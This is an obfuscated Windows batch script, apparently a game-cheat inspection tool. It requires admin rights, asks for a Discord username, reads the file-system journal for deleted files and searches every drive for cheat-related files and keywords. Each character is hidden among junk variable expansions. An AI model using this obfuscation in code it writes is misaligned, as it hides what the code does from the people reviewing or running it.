@%jDrSp%e%pi[CZd%c%SKyI@%h%@cTbo%o%kMKw)h% %v?DqoWd%o%(mjiS%f%_YuGN%f%WddCD?%
c%cKkAUC%l%BXsrL%s%vDQ[s%
t%s[p(hH%i%ALOAtFn%t%rTxV[%l%mjU#R%e%Mltl$l% %HAJ?q%D%EI?zXm%i%RISxNju%e%))VQ#K%g%StbF]RZ%o%#?oaw%'%hplSlm%s%]gu#KM% %fVJDR%I%xqmQuGV%n%obbVB%s%kXLlu%p%ok$(sVF%e%nQ$sd%c%EaRea%t%d$admXC%i%@IQNF[V%o%yHOYEF]%n%nhanWd% %d,jkq%T%bmPO#%o%.ShNL%o%E@z?V%l%(sNDFLV%
M%b$#[,eW%O%Z?uSZ@%D%LjhBoNT%E%sLZy[z)% %dJ[(#gp%5%L$)()%5%DCJmM%,%(NhupsX%2%zFlVa%0%YIzaj.I%
c%CzVaJ%o%ODqxC%l%GG)bOY%o%hxahz%r%e@djS% %#Q,eF%4%N(iUwsI%
s%VxVCblF%e%RsLXhR%t%ARkTJu[%l%OO)bx%o%NDKfQ)D%c%JL?IFXJ%a%tznmk%l%MXuE,% %MRRXsLY%e%KmA(#%n%zi,gb%a%mIpbNu%b%zEbUS%l%$QiJrl%e%ujn[fF%d%cQFnsWc%e%VCWlZl%l%pgfWl%a%FtCLT%y%UztF.%e%wrOXGc_%d%_giGnAW%e%,GcQJQe%x%y)XhIZ)%p%]#snT%a%tIlcE%n%ZdvneWi%s%mZOvyL%i%EIXH$U%o%lYVyM%n%suOzxnH%

 %nFKNc)J%N%?EgbHFT%E%_pBuO%T%bNI)h,% %ILVlg%S%#ULgtG%E%tY,iS%S%u[fgb%S%[IlrY%I%A,eqi%O%tejse%N%i[xz.Me% %AJHn(Yo%>N%z.?Ow%U%O_Cr[%L%,]VRDS% %AAPXg%2%Q#HnDvz%>&%VkwYE%1%lxhRW%
 %?xarTI% %eppALz% %U?fvaL.% %#uPIcG% %KfSJdb%i%mg?A@hf%f%DrVdDL% %iFkrUJn%%ERRORLEVEL% %tgaWl$n%N%feQiUak%E%kW_Ct@E%Q%pHtaDLG% %LS)]IaO%0%#LiZbEG% %atWrK$%(%_fw.j%
 %),[ER% %ROvvsn% %WWg,YRT% %hFGjhA% %zOxWAN% %U]SMSo% %yPBL(% %ryg$LJ% %IDjaa%R%GggqL%E%tRzqR%M%$TH(d% %luGAhUw%P%?yB_V%r%J_KDw%o%.N)FbT%m%XJBchNR%p%nlECUhO%t%$Wkk.k% %glwtd%u%zMpZdOT%s%tYjcJ%e%ifa$d%r%WrKdf% %$eb$y#y%f%q(IpagI%o%?vgwHhz%r%_MOEZ% %,uJNB[%e%lPoz?%l%ucYHIN%e%TEhzoX%v%OorQsl%a%BqRuN%t%H,DE$h%e%zSvf_%d%shs.#O% %TZUQ(%p%aW.$mb%r%Y$GiWHl%i%mHJbE%v%XcLyjt%i%(Dfe[#w%l%#xxJSAl%e%QamyqL%g%wHJwq%e%MV[m@xd%s%weJ@_%
 %EbXzmwc% %YC_JAmr% %hY)TM% %i)JNyCz% %XBSQCF@% %z$wu#% %Y@wRap% %Amq?P% %PUcmvZL%e%.lbTXYg%c%qNUrWfB%h%OrpMyy%o%ipk.El[% %?NcMe%R%TEHj@O%u%soInvy[%n%.aatR% %KDIUl]%A%nCMvOIg%s%W))brR% %BoV,j%A%gYH_u%d%yETbsql%m%j,QWg%i%V,Vim$R%n%w(uBl(J%.%fKnuQ)Q%.%gyUAaht%.%o#]PB$I%.%ydDqH]Z%.%$.oIB?t%.%gFGKZ%
 %xIr_?@g% %KmwY$t_% %DYbNADI% %WmrrB% %_ilih% %KDIHvS% %U[jaI% %SNReNIu% %$.cN@j%e%f?ZfWS.%c%@Cs#Hg]%h%HNZOt%o%ecJdiQ%.%R[iXcA%
 %oWyo(i% %DNmxS% %kO)Kh% %,Ra@lwj% %$Fd?rz% %GTnua]l% %)qmz_% %]WCh.% %FggEKVU%p%Gj_cH%a%OJg[[Aj%u%AHe@uP%s%lC_ksx%e%xKCio%
 %mNaNPqe% %@ga$Nm% %rFB,rG% %,XKOl% %)N.?T% %mXolc,X% %K[zN@RY% %rjOwsYD% %pcdY#%e%qdP[P[o%x%X#n]u%i%bhMtq%t%uJ,CU% %G([X.kp%/%.?VKOT%b%ktJV_o%
 %UINJr% %da$tf% %)fdn)e% %,vUZE% %,])l@l%)%JyD?taF%
	%sBm@j% %z?oHq%
e%.MtHFUB%c%zB[NPZv%h%VsKbNmn%o%brIVn(% %my.uuM%[%zgBvu%V%T]tIh%e%ysSCmgY%r%j@CkLOw%s%,rvUjRZ%i%OlNit%o%l#XYPye%n%NQsnH% %hYCOcu$%4%#uNA$DG%.%pzWRr%7%wKCm$k%.%ouyyHqN%1%RuNvdW)%]%QwJ@k%
e%OGm$Wd%c%LfXDlCq%h%SFfMtL%o%@)XVy$%.%wi,IxMf%
s%[Ej]cfy%e%KBquR(?%t%.lluK,% %atq#,L%/%STOP,%p%ULsUf.@% %CGN$Zx%D%,Gjf?c?%i%KaTotp%s%@?yIu%c%wWb_j%o%V,(LZR%r%jD[,wx%d%AvSgW%=%aquSgH%"%hErd][j%E%rruLY%n%ZvHEw%t%qnbSID%e%ufKfe%r%u[JSdll% %hurwj%y%cEdqD%o%DFA$hV%u%VthjTlX%r%yhyJl% %rAyAC%D%_HcXei?%i%CPI.c#)%s%Crewp%c%RLINsM%o%Tp[izK%r%CKBVRP)%d%GvMpuq% %vfa$gry%U%?Mqw?]n%s%tUZED%e%gnQB[%r%Lii)G%n%sLh]T%a%sZP.uNZ%m%I?hC([k%e%ZQWV[pD%:%HJ]FTUA% %PV_)WSY%"%U#nOp%

 %A]IH@Kp% %RYWByU% %tvU@SWX% %l$qtCD% %vivBu_j% %_wcL,B% %,mcQc% %b,OZwPG% %mMXOUB% %$P]DilQ% %OPOZ$% %npKLHZz% %vWs]M)D% %(DjKo%c%aSsosw%l%lRii(r%s%qTiegcc%
R%No(b[%E%YpcmBl%M%ck_a]% %(aeIHDA%C%wDztg%L%w@kHr%E%OSO]k@%A%.F.]uz)%R%rxfGvrb% %KCGtQMd%C%iCDag%H%QbN?jG%A%djH,p)v%T%Vircc?% %eWBHu]J%^

e%CtX(@F%c%R,,jrP[%h%bs#fm#%o%M@c[Bb% %qjiYV%P%OhyHgQc%l%FtYNI,@%e%mu,nlhu%a%gaG?g%s%C.FcM%e%xjsYt% %IrtO_E%W%gcSWF%a%TqXElRS%i%_xQkfB%t%DIwSCv%:%#vyhdyJ% %KcCE#%%Discord%
e%nPZND%c%cA@?l%h%BaviX%o%tat[GXy% %?wLhuMU%S%Z?g,Hd%t%e(QkOG%a%XXE)tGk%r%GMeAdzT%t%)MJBQgN%i%XRz?X%n%(jjYhj%g%Klitj%.%ZQKNJbW%.%HLv_gS#%.%elgTIO%.%NOX$Q$w%

R%_fKFj%E%WNhngs%M%pfhnv% %aBVZn%F%x#uz,K%U%piANC%N%([Bbtin%C%F?kEjIU%T%)KVeG#B%I%YpcLy%O%_KGDS%N%.FPyM%S%JHgits% %FBjIT%

e%jqF$.eN%c%k$@Ba?@%h%xmkm?%o%v(tKk% %GVSmc,z%C%tgqHc%h%Fuz?blD%e%whJEw%c%iv(sW%k%.iCbJk%i%vnsK?RJ%n%XDKrWD%g%zYUZRfM% %X,ah?C%l%Utt]w%o%DhUzfIV%g%.$IhS%s%SIVdP%.%EUTe,S%.%ErV$U@%.%PolNiUm%.%.DQFA%

f%xvXh@TW%s%y[Y_(,%u%riJDZgx%t%Da(x.u%i%tXUQXQc%l%Czf,_$% %Le?GOg%u%LQupgg%s%m,X(N%n%HGEHdi% %(g]Ac%r%o.A.zK%e%_vqssV%a%LNsUTdh%d%#YvWP%j%XY?)Rg%o%wAm)PjS%u%RjhM,%r%qe)Oo%n%aw.aS%a%GB[SvT%l%$Mo@RGz% %aijhHL.%C%KQ@_A%:%CxRXY% %NhRJLL%c%XI)(L%s%jVyefmc%v%#VlI.Sn% %FwfMdk%|%jjxtRez% %xYyUe%f%$TgyVI%i%riAtPL%n%bW$iP%d%P][ggJi%s%yvu)bSA%t%]#(($%r%NrOqn#% %DI.qiN%/%.,FS@o$%i%jXnPGCt% %erdHY#%/%bpAU#%C%ffPzC[e%:%IGUuglH%"%r)uryPg%f%VmYWP%i%XvmReI%l%,UNLA%e%l.ytD@)% %CZ$jkJ?%d%KaC?JK%e%waM.[Au%l%y)lO]Eq%e%aPv?$i%t%?(Rp_%e%alGeyT%"%qumODge% %aoLMX%/%kJNdR%C%P@[SKuz%:%n[uwM%"%UydRXC.%r%GuLEC%e%cpzTkr%n%h#CIJ%a%$SWjsj%m%VpgAl.Y%e%fI]B.nd%:%Lg?$[w%"%JDPWi% %y)iiWA]%>> %z]xag%"%ObXN?N%I%ngeM,r%n%DmFV)@B%s%jCuvTda%p%pxPxH%e%(.t)krO%c%LjNkV%t%mam[ChA%i%Uh,eSrJ%o%GrfmQYN%n%seXhL% %EsSHA)d%D%UGOKQs)%e%GMUM)Q%l%[uV?V%e%[JptpZE%t%T]cCr%e%yrOrWo@%d%pP]YE)Q% %KKk#i[t%a%De@zuUr%n%@dG]OD,%d%bodsD% %D.pM[)%R%hUMwr%e%w#DiMQx%n%S,Vwowb%a%frU]L.G%m%G#hMME%e%ZvaWpep%d%q#gl(%.%gro[f%t%PesS(Us%x%ZvW(ZQ%t%Bqivn%"%k#kMi%

f%Cn][DH%o%TaeslaF%r%EzDjX% %)oXwlxX%%%D%mHmQO% %UxeBO%i%@zNFsP%n%h.RzM% %G#tTq%(%dmCSE%C%i]hh.q% %MGQd@%D%N[B#Ik% %DgEsX%E%luFqlz% %n)eWL%F%gd?(j?L% %nyqfn@h%G%bHnaXW% %Oka,nW%H%QZQyZKr% %#CZWv)w%I%TNJDw% %Rxetvob%J%swGu(H% %pHGcJA%K%iEl#x% %VtvUnBT%L%]ZcouvL% %K[xdk%M%]hmwLI% %r$j,w%N%xDoB[ZC% %)B?SaOE%O%tpnWL% %kVtfpmM%P%Qut)QH]% %WfwJX%Q%HCKJ(% %_sCFnU%R%HpOp#% %JRfMmEx%S%RttwSv% %t,TYBRY%T%].iff.o% %G.Kn)..%U%?ROhb% %FjvJac%V%?rC,KlG% %cw#oWo%W%]Yhvk% %GYJIn%X%eqyln% %Q@)Car%Y%?D#cpW% %z)iWdbO%Z%pE]Ju,#%)%gNINU?b% %?Gyuuw%d%MZy[inj%o%faCXp% %imBHI%(%swWFph%
 %CQK.SP% %X?Xr[C% %jK]]JLR% %Jwqto%i%ZcSm$@s%f%F@ipZ% %lZrR$%e%C[axr%x%mwMZUe%i%rNTTn%s%EzFJZA%t%CUAQI% %iCaoMlP%"%JA?JU_%%%D%WFxTV,r%:%]?u,d%\%jK)bmP%"%QSIdU% %UBND?%(%W,HiU%
 %GK)ZD% %)_Wc?y% %uAA$T?c% %Tei)y]% %kqMJA% %#axzqza% %piNMgB% %XP,l@[%f%lr@d.X%o%.Cd,N%r%MeuKLng% %rXdfqE%/%akNAc#%f%aTlaf% %CgUJqR%"%GVC_.o%d%OSqvE%e%vY.tgqe%l%TxbQm%i%@eW)J%m%fDlqIli%s%.[Knw%=%fiizAs%"%wJis(% %Lg]uP[b%%%F%)DhYfQe% %GL#)iI%i%#vnogcz%n%Kavnf% %MKNjr%(%F(aQrpj%'%S.qyqI%d%#][Cjwl%i%eTTiW%r%Ju$K#% %m,q,Y%/%]O)z)?%s%(yQ(Y% %QOPGWYS%/%XoATE%b%j]g$F% %XufyTnW%"%nAcQxgH%%%D%AJKJw%:%a(YGR%\%Hmcl,LH%*%n$txunu%.%eanjhT)%p%cqMGi.%h%Z(.U)%o%HXQiD#b%t%cLyvQRV%o%gvFccDN%s%),a,z%h%ej[W[%o%RHHWt%p%kSLvn%.%EhRqF%s%YWL$Jn%k%Jyx)c%e%ztoTPP%t%blS)Ijv%c%ohSKX%h%v)$ybQN%"%[sfmlBS%'%lrakaw%)%VFLxvl@% %WNnkY?%d%DhYtj,Y%o%PmWFmdP% %jHood%(%U@ODFCl%
 %wczbM% %jpTYXG% %NYCs?% %p[hzUp#% %.dgkh% %Hd]AMa% %Ki@$Bz% %xjW]f% %BHCWd% %.vZpmF% %UpsTJ% %JCdaO%e%hyN)JP%c%hnKnrh$%h%reOTtfR%o%W(dfe% %anfb,_N%C%itMmH]e%o%qR,oS#l%n%CBTAG.e%t%WwDRu#%e%hvo)?@o%n%#Bh?Mg%t%QNVRC% %dxU(,a(%S%QofGg#%k%Lo$X,FZ%e%LW,Vl%t%SvxlQvG%c%kIsu$%h%snsnIyZ% %YvVtpf%S%dgAJlH%e%?D,DjE%t%wFYti(X%t%bnjy@%i%FntJ$uM%n%lahTH%g%VOZbl?%s%oM$Cm%:%HRWBL% %U?NTpMp%>> %yRi$w%"%AkKaPm%I%SmHxn%n%S,PmW%s%CJ?)l#B%p%H@K@M%e%bdKy$uW%c%HBPx.%t%ceBK$%i%r(qiU%o%hxtgqZK%n%TmaJAP% %UomGiw%V%rbs@we%o%YJcgk%i%GBc#[i%d%PsZsH%T%igkis%o%Eebt]uf%o%BdlWYDf%l%,Oebcl%s%haiay%.%suFHy)U%t%Dc(bh%x%,Uojv?c%t%$zusdo%"%#WMDTX%
 %iivjkg% %NVjDRH% %F[_mHr% %.gYuVNM% %,@)qNr% %giQ(k% %v?vF(% %TbeSHt_% %vhS_XV% %pDCHa% %i)LOL% %hmZyPp$% %KGw)pe)%t%GP(qVHU%y%NHSguZ%p%Q?oqWj%e%DAOb(N% %jAn?MN@%"%wtSz$V%%%F%$JvxKe%"%KcqfNe% %YqTS)DB%>> %eSgWq%"%Amll(%I%US]yj%n%?qah.M%s%TOeDzjW%p%f[vjksA%e%Y[yVTLD%c%wYBaL%t%nJYlLnG%i%iULcF[G%o%koQnzx%n%$]HWKrb% %Q(.GK%V%My(u(Xk%o%X@kiR%i%mULJ_%d%oFjD@?%T%#jlyb%o%@W_?J_%o%]GUrE#%l%P#GCd%s%ZJpOa_%.%KoSzY.g%t%MP?HDI]%x%Xl_ZY?Q%t%h#f,o%"%UL@Izw%
 %huQ.t% %blElc% %Oy#NKG% %)mh#EFB% %jbjZj% %@$Muy_% %N?)NVdo% %hac#E% %lzyPPq% %#A@Lat% %G?A.b% %LNEKILx% %NF(ft?q%e%kW(d_ii%c%_LPJ]tL%h%Zp@cJ%o%Gueeas%.%YuYhu% %GxqNR%>> %bRK[jLg%"%JqbMTc%I%NnDn)%n%#Umzx%s%$#DnZ#P%p%wbub(S.%e%Z@hDi%c%YGrRWty%t%)LTCnb%i%[Qhm)W%o%iukq?js%n%MYR(HiD% %X$E(K]Y%V%(H)Y$D%o%hxFB?eJ%i%y_.bE[%d%(ucUcF%T%VEl?xf%o%Rfb?g%o%Mwn#)%l%acCk_sV%s%Z_dxYUz%.%olSxx%t%LkWNP%x%Bo)O.g%t%#cuBX%"%rLc_YV%
 %Kd)(@D% %n)DnU(% %nR]LIa% %_tdcIyw% %WsC(Wl% %qkgoKI% %tG$MHk% %l?r$[JB% %HL$H(_)% %?,GZRdE% %QmbV[cq% %RSWI_% %.b_Zsw%e%S]YDgOQ%c%gVma$wt%h%Spr#N%o%NUjhEOR% %]],.pD%I%A.??rPA%f%?yNsRg% %kFPL.%T%xlpAu(%h%xSdNyfQ%e%x[kaf$X%r%gHUbS%e%GUUrzA%s%dWw[e% %KcRChG%S%T?B?U$h%e%TSn)vr%t%ucd@w$%t%gqGlaGd%i%UQTDAD%n%rOvJ,%g%LArH)%s%..Ih$dP% %)Phb.u%B%skPJs%a%nI?CiOZ%n%Zyego% %[Tns]Ed%%Discord% %p.$pz%>> %.GgQChR%"%p)l]g%I%pJpG)%n%waJT,th%s%kEkhY%p%n)s$Oc%e%R?).ox%c%X[__HCC%t%Ba[hlMQ%i%..j@QBr%o%reqR.j%n%TF$)J% %ivMEHa%V%XWJpwEd%o%#b)A,TV%i%.tjhor%d%ThN(HQT%T%WWF(DNB%o%?vLa]%o%K,MqNhk%l%eIbpLuE%s%qv)Kzgj%.%PxaavE%t%c#kyC%x%ne.yDE%t%SxKuKTr%"%txRQ(kp%
 %LHLYnrE% %#PUYAb% %ioFY]% %S(gJG[% %QWMGAp% %TWZFhO% %lIVTLRc% %Ah@gb[U% %I.yjNE% %JtH@$R% %sG]#oX?% %rNmyjOO%e%eVNLlme%c%yMF$[%h%UqbIJg%o%tmq_C%.%diXG#% %rBVcrmy%>> %#rRLM%"%G[_maf]%I%DIg$VZi%n%N[TsJxI%s%HMSxIJ%p%oZTp_Ba%e%xLdpIHn%c%)zpVm_P%t%fEwwgY%i%CkCHk%o%mvAFtqo%n%ZJDHG% %sncE@%V%fBx$N%o%QqMzsLv%i%zKRpODZ%d%D(#?Zq%T%bN_Fr%o%D,a,.l)%o%U$DFPL%l%L@JHu,%s%C([kEJ$%.%hESQTl%t%q.T?_lW%x%GPBqX%t%lyhmd,%"%T?Xmr%
 %crFRcUy% %tCpUm@B% %yP,gi% %]U[XdGA% %.WFHrZ@% %bXTEr% %jr,w(xG% %GTW?I%)%bsCDHf%
 %XoZwV% %UH#ej% %jUR]$% %PwZ?M%)%CSZ)#%
)%jAz[y#%

 %PISxN% %u[(CEk% %dZIj)% %Evuln%e%DjmpS%c%qGbh.H%h%zL#bh%o%$A[@E% %dqnq[%L%Z#f)It%o%.VPl$W%o%gmtFy?X%k%d.qZyZq%i%irCz@%n%L$dLR%g%rVIRzM% %SYvDQ%f%lQfvy%o%woVu[%r%])f$q% %O,MD[U%C%J[.oZ%h%QPEiH%e%JXyoZ%a%tSxwQ#%t%JE#nyhL%s%mpiuY%.%(hDGeUJ%.%pO,$G%.%mQwZjT#%.%(,h_I% %ynOJd%

f%zpKPx%o%WMfyiq)%r%]QqhE% %KTGYFW#%%%D%]N#pt% %Kwql?I%i%NUA#iE%n%SfWMXi)% %GoY(Z%(%O$o[K%C%yevMqgu% %)JXUt%D%.Bnygy% %gy$Gher%E%kmiCIVm% %UejRp.R%F%tUk(yCG% %cZ.yn%G%Erf,F#% %p?Y,m%H%D#SgV% %vEhRbZ%I%HAYY)rN% %s@I?T%J%,bZ[Rg% %BkI[(hr%K%HRGYhIx% %_jJfmi[%L%(#YwXy% %N_dmNww%M%(@xH[U% %DyD[pN%N%SRzuP% %F)$(o[c%O%yZlJl% %b$@wEo%P%ndiga% %$nUhun%Q%bkK_gWC% %KPvuPGW%R%,Ek_E% %]$]ko%S%SoA_v#B% %wSY.cy?%T%#qry]YD% %YhhwdXE%U%Ad]]L% %VEP_zRA%V%bH.Gha% %YPFM.W%W%Iqvlp% %uV$plQa%X%DHevUU% %opNVW#%Y%yBDyNm% %V_f@ccV%Z%JHC$rWG%)%RthPz% %[JgtjL%d%RGHLEwm%o%p]GeD% %AgZ(KCm%(%NNRZMrO%
 %[DnGzw% %VfeFf% %JXld$% %j(loB%i%,wH,d%f%X)NVTr% %igJf?I%e%nrDEli%x%J_]zId#%i%T(jAXv)%s%mBcPgd%t%f@gc[@% %nLceO%"%XQb?wMe%%%D%zFf$)T%:%Ski]RH%\%,V?Jy%"%zIkrqb% %SEiHSEJ%(%nUTGho%
 %QuD]Ma% %nP__yq% %NrqZOsy% %mKTeqa% %dOk[XRs% %obsYW@K% %KVDNff.% %Y_GdWV%d%)g$enHz%i%brRtm%r%JioKy% %#,NFvZ[%/%x.xUC%s%lKW,apS% %g$@#_%/%rhdx)aK%b%,K[H,g% %?AspzZ%"%diqBm)u%%%D%K?VWY%:%hynotx%\%wSVQa](%*%CWDGdF%.%Ap[r,BV%a%SsM[nDz%h%RsAQnEm%k%hbCdDn%"%U.Zps_,% %v_jdyP%>> %joL.y%"%QbqAH%I%))LmugF%n%RuZv)%s%aYC[s[%p%N[rGwFp%e%BZPvR%c%bdu,b$%t%LPHIq@y%i%K.MHR[%o%t,zuhOH%n%EvihlH% %WHWICs,%V%_hCjT%o%XbCxI%i%MuxmD,V%d%Qs(_[%T%LBtKY%o%fpk]Q%o%_JSBYK$%l%SzhV_I%s%CfmZ[EB%.%WhRMMw%t%nChWiGg%x%)sI#tk%t%tDCSmdS%"%JUAz#TT% %HOMdtZ%2%Qfg(t$p%>n%Mp]dQ%u%yp]tYN%l%KNgnT%
 %u.knd_d% %t?WCtOW% %aMKdkX% %HdNsDFE% %UhbdA#% %$c$kdm% %Ge$nm% %byO.]mU%d%t_xI#%i%vBkCHc%r%)oPMe% %wCEXeJ.%/%#giteH%s%rOeMV% %pWCKuX]%/%nrGnI%b%V?Txe?O% %X@SSOZk%"%NQKRD%%%D%Y)SVW%:%#dydG[%\%SrQ(MN)%*%]RJCbF?%l%jzmEPa%n%R)E.m?%k%nXeY$X%.%xGkAPJ%*%RobKDim%"%DbUOEXA% %KCs?b%>> %)royw%"%On[hFn%I%tXyrBO%n%NN]ab%s%SQq[bj%p%azG_HaB%e%b?a,##%c%L#x(]YW%t%[KkIu_#%i%yP@clYZ%o%HRLfRT%n%[cNzY% %AE)#o]%V%ok$Kq%o%LGYlq@%i%DQoXr%d%UP,(Wst%T%cEEKV%o%Si[QR%o%DaDo_%l%a[J#ypm%s%V#qd(D%.%#prdZ%t%jqtSHoW%x%ST)jdR%t%UQsyn(%"%BXZXTx% %cn_y$%2%opdW_%>n%W)hfoH%u%LgMyr(G%l%vapE[y%
 %$syg.mD% %RDTVY@% %ykrLTk% %BnsYIa% %S#vnkK% %gMDUP% %Rxk,m% %szpq)Xh%d%YnPNXfN%i%WBj?Q%r%z#Sm)R% %bP]mQD%/%#_KdAg%s%lgwROA% %xU@Yey%/%h,mOHiR%b%pqxpL[% %sbbEyc]%"%]CfBY@d%%%D%[$v@fQB%:%p)PgrG%\%gm@zAj%*%?dJkr%s%CWIM)%k%b_Sb]%e%aX.jj%t%@QESKc%c%V]Lch(%h%LnTCr%*%nqM#K%.%hXuDs%*%b#SnY%"%T$qybta% %AVo)Iva%>> %GfwXWW%"%BZU$j%I%oYEEK%n%uT,Vt,T%s%kJ[v$b%p%v,zWe%e%vLkILQ%c%WzKjR%t%ojWTe%i%jwG#k%o%fwav$%n%NrTt[O% %tcT,GX%V%uA[$k%o%oRmaT%i%oZPXsF%d%QfGM.q%T%,zRY_mC%o%iz)u?pq%o%(tD([N%l%aId#n%s%IpWGXTP%.%$hwT]%t%tRt#W%x%)azfnD%t%NuQyW%"%szjRj% %lM.E?%2%eG?l,jm%>n%?Qsnu%u%@GczVh%l%s_bGOtl%
 %IYEhM[(% %TLShj(% %G[pcA% %,Ekawun%)%Rot)sVX%
)%NaLNOa%



 %A#kxAH?% %ONRoLt% %.FHqy% %_A,Xg% %qPCgf)% %[Ww,@.% %do]rgJP% %N(JKxXF% %z,yYpo% %ZY$UD% %sp@dR% %VGxGDR% %yQVRs% %$UuO.md%c%X#HDw%l%emRtpu%s%vaNTfvS%
R%iDeOK%E%HaErS%M%iZBWD)h% %aGH_ndy%C%Anm_g$%L%wvoom)%E%ckqrZ%A%$WbgMjT%R%,J.eZfy% %(GP?[%C%ty?Ol%H%.T]zpC(%A%e(.H[%T%@MyG(% %UhKi,K?%^
e%vLdKVP@%c%M_kp#%h%@rxR]LM%o%g[)_Fs% %lGE?v%P%b)qyr.o%l%rF?u?l%e%[zhLMD%a%swQ]#%s%,yHlgH)%e%LV]NcMb% %RiEkyJD%W%@ebwWT%a%M)QyMQ%i%dEjcET%t%$ey@EQ%:%wOSFu% %$dukwe%%Discord%

 %A[@bc%e%XD]BUB%c%yTsfC]%h%D)vDh(v%o%qFsLCf% %Hi_XAV_%S%m)ZxeGp%e%i?NMj?w%a%FHjhI%r%tpc,]Q%c%Mvc(I%h%RG.lH]%i%biF#D.%n%FxGasm(%g%fzgHMY% %YHHJBp%f%N)$DZd%o%xrhWE,%r%.]ORD% %owoFX%K%P.@EDC%e%OnD]dH,%y%apY.$Q%w%)Wj_@%o%y]iZDK%r%dyWqDU%d%bh[tD%s%roy[i%.%EsjDfxI%.%[(NJD%.%AOXwuI%.%HwM]@me%

 %KkHWi% %ga$zyOG% %@sp@@W% %@aBxZl#%> %$LWrSM%a%QPj(PZ%p%wohWf%p%]hRDWdG%a%JdQDots%s%C#hF.%a%Avk?y%r%Yrp]nK%.%@rE_pE%t%bdzSHo]%x%lIubS%t%AHI#gU_% %juCUHyq%(%jTV#P%
 %W,@Q(H% %spA.St% %yrVnCbQ% %mJkz@Hx% %iDy.vK#% %$PlNb% %M#CnhVo% %eIvzt%f%yLDG[%o%ImuYE(%r%RPg$(?H% %,yocD#,%%%D%$djb?u% %)knc.pU%i%_tyUkks%n%SYVFyyX% %frfaD%(%wMC(QI%C%ZDnkWhX% %dh]_nr%D%opKXHD?% %[UjINA%E%RFyWLbR% %wrqov?%F%.qIL$% %YiZfY%G%XaM[di% %wBJ,KG%H%oH(YQa% %#(QFj%I%lMUwpYH% %aajYm%J%GnQ$,?% %lK,ij%K%tTIAlU% %pEJme%L%#AsWr% %HmU,mR%M%uMkbXOl% %WC?BD%N%_EIBl% %hroFHS%O%nYTJiQX% %mL]ZOyz%P%Kk$BiD% %RON?xK.%Q%)w@.dJ)% %QhdJW[%R%ASF(#a% %Tk.Dd%S%K)jqK]j% %ELf,DK%T%dly@b% %pO@GQz%U%seMyH% %diFqtR%V%lonkLO@% %@hyZS%W%@EInFmc% %pBphU%X%YdOqe% %fLMot?%Y%LiFDPHU% %PDgFna,%Z%tyY?G%)%ji)$S]% %Kil,b?%d%]hPJNE%o%bTKyS% %_Uts(Wu%(%OCgd?%
 %bMqxA% %EoJ$Nt% %DGhbd% %jpmcaek% %p(JXd% %S]JhlU% %rWd.cg% %yjfQm.% %LUSL@% %sorjX% %rjRtP)% %g[s]Yt%i%[HwXDd%f%tMcPHL% %ZnuHY%e%RX)kh#%x%My]zu%i%y[_Aiv%s%YxY?zf%t%HF_kX% %x[hSe@%"%qxstS,%%%D%VZU#D.%:%UGfS_Ej%\%PetCJJ%"%yERhsS% %)GYHBU%(%?)aJN%
 %.z@Ob% %[rrT)% %Fz[jdLs% %uhbUDZ% %AhgxH% %HJcF_% %Nc.,HAm% %i.FpfyT% %fzNUv% %NIuwR% %EAVoW$c% %TVtjDe% %O)r,Kl% %lKkd$[% %QEzET% %dKRJE_(%d%ml#JJ.Q%i%o[ugCzD%r%].AeqT% %P.zfY%/%nmn$bq%s%sFKFke?% %PoaET%/%WTpcuut%b%QVFJrPn% %RGyngIi%"%jDYhqA%%%D%vvbe(i%:%Xmm[Q%\%_evCRC%*%nm[mt)$%.%rcaWuy%a%?LxZMGS%s%fnA,?%a%Btg,o%r%wuMLyFQ%"%Na@CZ%
 %)AtTMkl% %eFVGU% %oLpMamL% %RYIsR,% %iNzGnw% %uYDCX% %DBSNDNo% %L.V)Q% %J,xip)% %?lmTz% %A.vIh% %S]nsA#%)%Fkc(T%
 %?#V?LdU% %B.SAaY% %egBJW% %trYvZ% %_?]$I@% %gKdmq% %v?xC]% %XQvyYO%)%jxXLE%
 %INhj?R% %#]DruJu% %yaevY_% %f@oAz,S%)%EiFNet%

s%BERjePi%e%pm,MC%t%,@F?Z% %avhhc%"%YQKmI%k%PcijrU%e%sxSRnbH%y%cZbfB%w%TuhWl%o%pGi#wOh%r%xa,Eg%d%vufM_E%s%t?JCVe%=%$$is.N%s%RM.OZg%k%rT,OfQj%e%duK$[%t%JnTFpNT%c%.MpOo_B%h%dmqP.% %un,mfkl%j%PhUSnr%a%i$SXp_i%g%rVpIC_%u%,ajxK%a%,Np._%r%xBlu$% %QAsrkF%h%j(H.t%t%ZIk_l@)%t%e(Qwsa%p%rAtjqC%s%c[@nLH%:%gb_]$%/%NuVtYM%/%)ft#Pzv%s%fjLbsAH%k%mi_vFjO%e%)oLcYw%t%nz(SD%c%$o)$qVO%h%FUg?hEY%.%VH?[F%s%Lhw$o%y%B_r)]yL%s%o@rEqJ%3%yZMUk[%2%O@xr,OF%.%LIL?gXx%d%uufeHNX%e%F.K#ohL%v%OQSqm%/%rHhKjhi%s%N$lst%t%#EgEIO%a%uL?Me[,%b%RxMzbz%l%jKMJn%e%twx(or%/%XbWMp%s%Z)vwG%k%WtE[KZ%e%Z@kO.%t%TmByRad%c%LPQxz%h%hescyE%.%EQ#d@%u%UWNVyx%s%wenjKG%e%J,MjZJ%r%oHvMRzR%.%mEAibP%j%cRflDOU%s%r_piOR% %nFwPb%k%ZpCJ,vY%r%oKRYD%u%lMLRF%n%@NVbDu%k%MfhaU%s%YdnL(Y%e%fGijKKp%n%oO]_z%s%a?Eih%e%@M)YJi%"%SKwvsfm%
s%yDcBbK%e%QKhs.y%t%OCvsL% %I$xQt%"%J(LBS%o%GcrtJhk%u%SYUhLX%t%VIs_(aB%p%XPqp]YF%u%SdlVA%t%JrG,ZP%f%dRERNX?%i%?,Hu$%l%aBHYIbf%e%Ki@Utt%=%fdt@DZ%I%gtHB$Ig%n%agshMK%s%oBKrV(G%p%HRxIr[%e%FqZs#%c%?kPim)%t%TPwUDe%i%afwSgl?%o%OJs_ckl%n%ZpfU_NM% %Ts]JDiX%A%u$xsfBg%P%#Hl,x%P%eZsWwfO% %kQTSI_%A%au(Po%S%x[svZ%A%ljF#w%R%GSy[i%.%#vNBN%t%pch[p%x%HnOp)C%t%p?NkYq%"%ydI(T%

